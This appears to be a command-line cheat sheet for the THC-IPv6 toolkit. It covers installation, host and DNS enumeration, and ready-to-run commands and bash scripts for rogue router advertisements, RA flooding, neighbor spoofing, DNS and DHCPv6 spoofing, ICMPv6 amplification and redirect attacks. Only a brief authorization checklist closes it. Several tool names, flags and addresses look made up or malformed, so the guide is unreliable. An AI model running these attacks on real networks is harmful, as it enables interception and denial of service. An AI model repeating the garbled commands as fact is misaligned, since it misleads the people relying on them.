THC-IPv6 is a comprehensive toolkit for IPv6 network security testing and vulnerability assessment. It provides advanced tools for IPv6 reconnaissance, neighbor discovery manipulation, address scanning, and exploit delivery. This toolkit is essential for authorized security professionals testing IPv6 network implementations, identifying configuration weaknesses, and validating security controls in modern dual-stack environments.
# Required packages
sudo apt-get update
sudo apt-get install build-essential libpcap-dev libssl-dev
# Git for cloning
sudo apt-get install git
git clone https://github.com/vanhauser-thc/thc-ipv6.git
cd thc-ipv6
# Build toolkit
make
# Install globally (optional)
sudo make install
# Download source
wget https://www.thc.org/thc-ipv6-3.8.tar.gz
tar -xzf thc-ipv6-3.8.tar.gz
cd thc-ipv6
# Compile
./configure
make
sudo make install
# List available tools
ls thc-ipv6-*
# Check specific tool
./thc-ipv6-address-scan --help
| Tool | Function |
|---|
address-scan | IPv6 address scanning and discovery |
alive6 | Detect alive IPv6 hosts |
dnsdict6 | DNS enumeration for IPv6 |
dnsspoofx | IPv6 DNS spoofing |
fake-advertise6 | Router advertisement spoofing |
flood-router6 | Router advertisement flooding |
nd6 | Neighbor discovery manipulation |
packetgen6 | Custom IPv6 packet generation |
rsmurf6 | Reflection DDoS testing |
smurf6 | IPv6 ICMP amplification |
toobig6 | Fragmentation bomb attacks |
# Scan local network for IPv6
./alive6 eth0
# Scan specific range
./alive6 -p eth0 fe80::/10
# Output to file
./alive6 eth0 > hosts.txt
# Scan IPv6 address range
./address-scan eth0 2001:db8::/32
# Fast scan mode
./address-scan -s eth0 2001:db8::/32
# Verbose output
./address-scan -v eth0 2001:db8::/32
# Save results
./address-scan eth0 2001:db8::/32 > ipv6_addresses.txt
# Enumerate IPv6 DNS records
./dnsdict6 -d example.com
# Use wordlist
./dnsdict6 -w wordlist.txt example.com
# Reverse DNS lookup
./dnsdict6 -i 2001:db8::/32
# Full scan mode
./dnsdict6 -f -d example.com
| Scan Type | Command |
|---|
| Active scan | address-scan eth0 range |
| Alive detection | alive6 eth0 |
| DNS enumeration | dnsdict6 -d domain |
| Reverse lookup | dnsdict6 -i range |
# Send neighbor discovery packets
./nd6 -i fe80::1 eth0 2001:db8::1
# Solicitation injection
./nd6 -ns eth0 2001:db8::/64
# Advertisement injection
./nd6 -na eth0 2001:db8::/64
# Fake router advertisement
./fake-advertise6 eth0 2001:db8::/64
# Flood network with RA
./flood-router6 eth0
# Router advertisement with payload
./fake-advertise6 -e eth0 2001:db8::/64
# Test DAD mechanism
./nd6 -dad eth0 2001:db8::1
# Verify DAD responses
./alive6 eth0 | grep -i "duplicate"
| Attack | Command |
|---|
| Neighbor spoofing | ./nd6 -i |
| Router advertisement | ./fake-advertise6 |
| RA flooding | ./flood-router6 |
| Address conflict | ./nd6 -dad |
# Test ICMP echo amplification
./smurf6 eth0 target_ipv6
# Multicast amplification
./smurf6 -m eth0 2001:db8::1
# Verify amplification potential
./alive6 eth0 ff02::1
# Send oversized packets
./toobig6 -H eth0 target_ipv6
# Fragment reassembly test
./toobig6 eth0 2001:db8::1
# Heap overflow test
./toobig6 -s eth0 2001:db8::1
# Send ICMPv6 redirect
./redirect6 eth0 2001:db8::1 2001:db8::2
# Gateway manipulation
./fake-router6 -r eth0 2001:db8::/64
| ICMP Attack | Command |
|---|
| Smurf attack | ./smurf6 eth0 target |
| TooBig attack | ./toobig6 eth0 target |
| Redirect | ./redirect6 eth0 target gate |
# Generate custom IPv6 packet
./packetgen6 eth0 \
--src 2001:db8::1 \
--dst 2001:db8::2 \
--proto tcp \
--payload "test"
# Raw packet crafting
./sendpkt6 eth0 2001:db8::1 2001:db8::2
# ICMPv6 packet
./packetgen6 eth0 --icmpv6 --type echo-request
# TCP packet
./packetgen6 eth0 --tcp --port 80
# UDP packet
./packetgen6 eth0 --udp --port 53
# Start DNS spoof server
./dnsspoofx eth0 example.com 2001:db8::1
# Targeted DNS poison
./dnsspoofx -t 2001:db8::100 eth0 example.com 2001:db8::1
# Wildcard DNS spoofing
./dnsspoofx eth0 '*.example.com' 2001:db8::1
# Send rogue DHCPv6 server
./fake-dhcp6 eth0 2001:db8::/64
# DHCPv6 information request
./fake-dhcp6 -i eth0 2001:db8::1
# 1. Detect IPv6 hosts
./alive6 eth0
# 2. Enumerate addresses in range
./address-scan eth0 2001:db8::/32
# 3. Scan for DNS entries
./dnsdict6 -d example.com
# 4. Test neighbor discovery
./nd6 -i fe80::1 eth0 2001:db8::1
# 5. Check ICMP behavior
./alive6 eth0 ff02::1
#!/bin/bash
INTERFACE="eth0"
TARGET_RANGE="2001:db8::/32"
echo "[*] Starting IPv6 security assessment..."
# Phase 1: Discovery
echo "[*] Phase 1: Host Discovery"
./alive6 "$INTERFACE" > hosts.txt
# Phase 2: Address Enumeration
echo "[*] Phase 2: Address Enumeration"
./address-scan "$INTERFACE" "$TARGET_RANGE" > addresses.txt
# Phase 3: DNS Enumeration
echo "[*] Phase 3: DNS Enumeration"
./dnsdict6 -d example.com > dns_results.txt
# Phase 4: Vulnerability Testing
echo "[*] Phase 4: Vulnerability Testing"
# Test RA floods
./flood-router6 "$INTERFACE" &
sleep 10
pkill -f "flood-router6"
# Phase 5: Reporting
echo "[*] Assessment Complete"
echo "Results saved to: hosts.txt, addresses.txt, dns_results.txt"
# Router advertisement flood (controlled)
timeout 60 ./flood-router6 eth0
# ICMPv6 amplification (test environment)
./smurf6 eth0 target_ipv6 &
sleep 30
pkill -f "smurf6"
# Fragmentation bomb
./toobig6 eth0 target_ipv6
#!/bin/bash
INTERFACE="eth0"
echo "[*] IPv6 Security Validation"
# Test 1: Router Advertisement Guard
echo "[Test 1] Testing Router Advertisement Guard..."
./fake-advertise6 "$INTERFACE" 2001:db8::/64
# Test 2: ICMP Rate Limiting
echo "[Test 2] Testing ICMP Rate Limiting..."
./alive6 -R "$INTERFACE" | head -20
# Test 3: DAD Functionality
echo "[Test 3] Duplicate Address Detection..."
./nd6 -dad "$INTERFACE" 2001:db8::test
# Test 4: ND Inspection
echo "[Test 4] Neighbor Discovery Inspection..."
./nd6 -ns "$INTERFACE"
echo "[*] Validation Complete"
# Configure forwarding
sudo sysctl -w net.ipv6.conf.all.forwarding=1
# Send redirect packets
./redirect6 eth0 target_ipv6 gateway_ipv6
# Monitor traffic
tcpdump -i eth0 -n icmpv6
# Send malicious RA
./fake-advertise6 \
--prefix 2001:db8::/64 \
--lifetime 3600 \
--mtu 1280 \
eth0
# Persistent RA generation
while true; do
./fake-advertise6 eth0 2001:db8::/64
sleep 10
done
# ARP-equivalent for IPv6
./nd6 -i fe80::1 eth0 2001:db8::1
# Multiple spoofed neighbors
for i in {1..10}; do
./nd6 -i fe80::$i eth0 2001:db8::$i &
done
#!/bin/bash
TARGET_NETWORK=$1
INTERFACE=${2:-eth0}
OUTPUT_DIR="ipv6_scan_$(date +%Y%m%d_%H%M%S)"
mkdir -p "$OUTPUT_DIR"
echo "[*] IPv6 Comprehensive Scan"
echo "[*] Network: $TARGET_NETWORK"
echo "[*] Interface: $INTERFACE"
echo "[*] Output: $OUTPUT_DIR"
# Host discovery
./alive6 "$INTERFACE" > "$OUTPUT_DIR/alive_hosts.txt"
# Address enumeration
./address-scan "$INTERFACE" "$TARGET_NETWORK" > "$OUTPUT_DIR/all_addresses.txt"
# DNS enumeration
./dnsdict6 -d "$(echo $TARGET_NETWORK | cut -d: -f1-2).org" > "$OUTPUT_DIR/dns_records.txt"
# Generate report
cat > "$OUTPUT_DIR/report.txt" << EOF
IPv6 Security Assessment Report
Generated: $(date)
Target Network: $TARGET_NETWORK
Interface: $INTERFACE
Findings:
- Alive hosts: $(wc -l < $OUTPUT_DIR/alive_hosts.txt)
- Total addresses: $(wc -l < $OUTPUT_DIR/all_addresses.txt)
- DNS entries: $(wc -l < $OUTPUT_DIR/dns_records.txt)
EOF
echo "[*] Scan complete. Results in: $OUTPUT_DIR"
#!/bin/bash
INTERFACE=$1
echo "[*] IPv6 Vulnerability Detection"
# Test 1: RA Guard bypass
echo "[Test 1] Router Advertisement Guard..."
./fake-advertise6 "$INTERFACE" 2001:db8::/64 2>/dev/null
[ $? -eq 0 ] && echo "WARNING: RA Guard may be bypassed"
# Test 2: ICMP rate limiting
echo "[Test 2] ICMP Rate Limiting..."
for i in {1..100}; do
./alive6 "$INTERFACE" > /dev/null 2>&1
done
# Test 3: Neighbor Discovery security
echo "[Test 3] Neighbor Discovery Security..."
./nd6 -i fe80::ffff "$INTERFACE" 2001:db8::1 2>/dev/null
# Test 4: DNS security
echo "[Test 4] DNSSEC Validation..."
./dnsdict6 -d example.com 2>/dev/null
echo "[*] Testing complete"
# Verify IPv6 is enabled
./alive6 eth0
# Check address assignment
./address-scan eth0 ::/0
# Validate AAAA records
./dnsdict6 -d example.com
# Test dual-stack routing
./packetgen6 eth0 --icmpv6
# Discover all devices
./alive6 eth0 > network_devices.txt
# Map IPv6 topology
./address-scan eth0 2001:db8::/32 > ipv6_topology.txt
# Document DNS infrastructure
./dnsdict6 -d example.com > dns_infrastructure.txt
# Test RA Guard
./fake-advertise6 eth0 2001:db8::/64
# Test ICMP filtering
./alive6 eth0 ff02::1
# Test DHCP snooping
./fake-dhcp6 eth0 2001:db8::/64
# Verify firewall rules
./packetgen6 eth0 --tcp --port 22
# Check installation directory
ls -la thc-ipv6-*/
# Add to PATH
export PATH=$PATH:$(pwd)/thc-ipv6-*
# Or use full path
./thc-ipv6-address-scan eth0 ::/0
# Most tools require raw socket access
sudo ./alive6 eth0
# Or use setcap
sudo setcap cap_net_raw+ep ./address-scan
# Verify interface
ip -6 link show
# Check IPv6 is enabled
cat /proc/sys/net/ipv6/conf/all/disable_ipv6
# Enable IPv6 if needed
sudo sysctl -w net.ipv6.conf.all.disable_ipv6=0
# Use fast scan mode where available
./address-scan -s eth0 2001:db8::/32
# Reduce scope
./address-scan eth0 2001:db8:1::/48 # Smaller range
# Increase timeout
./alive6 -T 2 eth0
- Ensure written authorization before testing
- Document all testing activities
- Follow responsible disclosure
- Maintain confidentiality of findings
# Test in controlled environment
# Use isolated network segments
# Limit test scope and duration
# Monitor for unintended impacts
# Have rollback procedures ready
- Wireshark — IPv6 packet analysis
- Zeek — IPv6 network monitoring
- Suricata — IPv6 intrusion detection
- scapy — Python IPv6 packet crafting
- hping3 — IPv6 packet generator
